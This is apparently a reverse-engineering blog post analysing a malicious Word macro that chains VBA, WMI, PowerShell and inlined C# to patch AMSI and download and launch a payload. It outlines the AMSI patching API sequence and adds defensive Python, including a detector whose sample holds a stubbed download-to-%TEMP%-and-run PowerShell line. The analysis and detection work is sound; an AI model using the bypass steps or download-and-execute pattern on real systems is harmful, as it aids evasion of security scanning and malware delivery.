Obfuscated VBA, Powershell, C#

VBA Macros remain a dominant attack vector. Today, we perform a deep-dive analysis of a multi-tiered threat that chains VBA, WMI Objects, PowerShell, and Inlined C#, complete with an AMSI bypass.

MD5: 9eafc9090d71b382af7c8c04e83d61d2
Sample: Download via Any.Run


Initial Analysis: The Office Container

This sample was provided by a reader curious about our approach to modern Word documents. We start by inspecting the file in a hex editor. The PK header immediately tells us this is a ZIP-based Office Open XML (OOXML) file.

Hex Header Analysis

Using OfficeMalScanner, we extract the VBAPROJECT.BIN. Scanning that binary reveals a heavily obfuscated VBA script designed to be unreadable to the human eye.



Opening Pandora's Box: VBA & WMI

We can't just run the script; it relies on hidden document variables to function. By debugging in Microsoft Word's Developer Tools and checking the Locals window, we find two critical variables:

  • Variable 1: Decodes to a WMI Object (Win32_Process) used to launch stealthy processes.
  • Variable 2: Decodes to a large PowerShell script.

VBA Variables Debugging
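As an added triage example (not code from the original write-up), the Python below automates the container checks described above: it verifies the PK magic that identifies an OOXML ZIP, inventories the archive to flag VBA project storage, and reads the document variables that Word persists in word/settings.xml, reporting their sizes so an unusually large one (the kind that decodes to a whole PowerShell script) stands out before any macro is debugged. The in-memory sample document, the variable names v1/v2 and the 1024-character threshold are constructed assumptions for the demo.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

OOXML_MAGIC = b"PK\x03\x04"  # ZIP local-file header; what the hex editor shows first
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
LARGE_VAR_THRESHOLD = 1024   # assumed cut-off: document variables are rarely this big


def is_ooxml_container(data: bytes) -> bool:
    """True when the blob starts with the ZIP header, i.e. it is an OOXML package."""
    return data[:4] == OOXML_MAGIC


def triage_docx(data: bytes) -> dict:
    """Inventory an OOXML blob: list entries, flag VBA storage, size the docVars."""
    if not is_ooxml_container(data):
        raise ValueError("not an OOXML/ZIP container")
    result = {"has_vba": False, "doc_vars": {}, "entries": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        result["entries"] = names
        # vbaProject.bin is the OLE stream OfficeMalScanner extracts
        result["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if "word/settings.xml" in names:
            root = ET.fromstring(zf.read("word/settings.xml"))
            # ActiveDocument.Variables live here as <w:docVar w:name=".." w:val=".."/>
            for dv in root.iter(f"{{{W_NS}}}docVar"):
                name = dv.get(f"{{{W_NS}}}name")
                result["doc_vars"][name] = len(dv.get(f"{{{W_NS}}}val", ""))
    return result


def flags(result: dict) -> list:
    """Human-readable indicators an analyst would want before opening the file."""
    out = []
    if result["has_vba"]:
        out.append("VBA project storage present (vbaProject.bin)")
    for name, length in result["doc_vars"].items():
        if length > LARGE_VAR_THRESHOLD:
            out.append(f"oversized document variable '{name}' ({length} chars)")
    return out


def build_sample() -> bytes:
    """Constructed stand-in for the analysed .docm: macro storage plus two docVars."""
    settings = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<w:settings xmlns:w="{W_NS}"><w:docVars>'
        '<w:docVar w:name="v1" w:val="winmgmts:Win32_Process"/>'
        f'<w:docVar w:name="v2" w:val="{"A" * 4096}"/>'
        "</w:docVars></w:settings>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 32)  # OLE magic
        zf.writestr("word/settings.xml", settings)
    return buf.getvalue()


if __name__ == "__main__":
    report = triage_docx(build_sample())
    for line in flags(report):
        print(line)
```

Run against a real document by replacing build_sample() with open(path, "rb").read(); a document that is not a ZIP raises immediately, which is itself a useful signal that you are looking at a legacy OLE .doc rather than OOXML.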


PowerShell & Inlined C#

The PowerShell stage is just a wrapper. After cleaning up the code in the PowerShell ISE, we find an Add-Type call. This is a classic technique for "inlining" C# code directly into a PowerShell session.

The decoded C# code contains the final payload logic, but it has one more trick up its sleeve before it reaches out to the internet.



The AMSI Bypass

The Anti-Malware Scanning Interface (AMSI) is designed to catch scripts like this as they de-obfuscate in memory. To beat it, this malware uses a sophisticated patching technique:

  1. Uses LoadLibrary to obtain a handle to amsi.dll.
  2. Locates AmsiScanBuffer via GetProcAddress.
  3. Uses VirtualProtect and RtlMoveMemory to overwrite the function's first instructions, effectively disabling the scan engine for the current process.


The Finish Line: Final Payload

With AMSI disabled, the C# code reveals its true purpose: downloading the final stage malware from a remote URL. Using a WebClient connection, it pulls an executable into %TEMP% and launches it.
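The three PowerShell-stage behaviours described above (Add-Type inlining C#, the AMSI patching API chain, and the WebClient download-to-%TEMP%-and-launch) share a static signature that a defender can match before the script ever runs. The following Python is an added detection example, not code from the original analysis: each rule lists the strings that must all be present for a stage to count, and the AMSI-tamper verdict requires the amsi.dll/AmsiScanBuffer reference together with the memory-patching APIs, so a script that merely mentions AMSI is not flagged. The two script excerpts are constructed for the demo and carry only the indicator names, not working logic; the weights and the Loader class name are assumptions.

```python
import re

# (stage, regexes that must ALL match, weight)
RULES = [
    ("inline_csharp",
     [r"Add-Type\s+-(?:TypeDefinition|MemberDefinition)\b"], 2),
    ("dynamic_api_resolution",
     [r"\bLoadLibrary[AW]?\b", r"\bGetProcAddress\b"], 2),
    ("amsi_reference",
     [r"\bamsi\.dll\b|\bAmsiScanBuffer\b"], 3),
    ("memory_patch",
     [r"\bVirtualProtect(?:Ex)?\b", r"\bRtlMoveMemory\b|\bWriteProcessMemory\b"], 3),
    ("download_and_execute",
     [r"\bDownload(?:File|String|Data)\b",
      r"\$env:TEMP\b|%TEMP%|\bGetTempPath\b",
      r"\bStart-Process\b|Process\]::Start\b|\bInvoke-Item\b"], 3),
]


def scan_script(text: str) -> dict:
    """Match each stage's full indicator set and derive a score plus an AMSI verdict."""
    stages, score = [], 0
    for stage, patterns, weight in RULES:
        if all(re.search(p, text, re.IGNORECASE) for p in patterns):
            stages.append(stage)
            score += weight
    # The page's bypass shape: an AMSI target named alongside write-and-patch APIs.
    amsi_tamper = "amsi_reference" in stages and "memory_patch" in stages
    return {"stages": stages, "score": score, "amsi_tamper": amsi_tamper}


# Constructed excerpt mirroring the analysed wrapper; the class name Loader is assumed
# and the calls carry no working logic, only the names the detector keys on.
SUSPICIOUS_SAMPLE = r'''
$src = Get-Content "$env:TEMP\stage.cs" -Raw
Add-Type -TypeDefinition $src
[Loader]::Resolve("amsi.dll", "AmsiScanBuffer")   # LoadLibrary / GetProcAddress inside
[Loader]::Patch()                                  # VirtualProtect / RtlMoveMemory inside
(New-Object Net.WebClient).DownloadFile($u, "$env:TEMP\update.exe")
Start-Process "$env:TEMP\update.exe"
'''

# Constructed benign admin script: touches %TEMP% and Add-Type, but no full stage.
BENIGN_SAMPLE = r'''
Get-ChildItem "$env:TEMP" | Where-Object Length -gt 1MB | Sort-Object Length
Add-Type -AssemblyName System.Windows.Forms
'''


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_script(sample))
```

Because every stage demands all of its indicators, the benign script scores zero even though it references $env:TEMP and Add-Type; the score and the stage list are what you would forward to a SIEM rule or attach to a ScriptBlock logging alert.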

Final Download URL Revealed


Conclusion: Why Do It Manually?

Could we have just run this in a sandbox? Yes. But as reverse engineers, we must be curious. Sandboxes can be tricked by anti-analysis checks, and IOCs can be faked. By painstakingly sifting through the code, we learn the how and the why—the only way to stay ahead of tomorrow's threats.

Stay curious. Happy Hunting.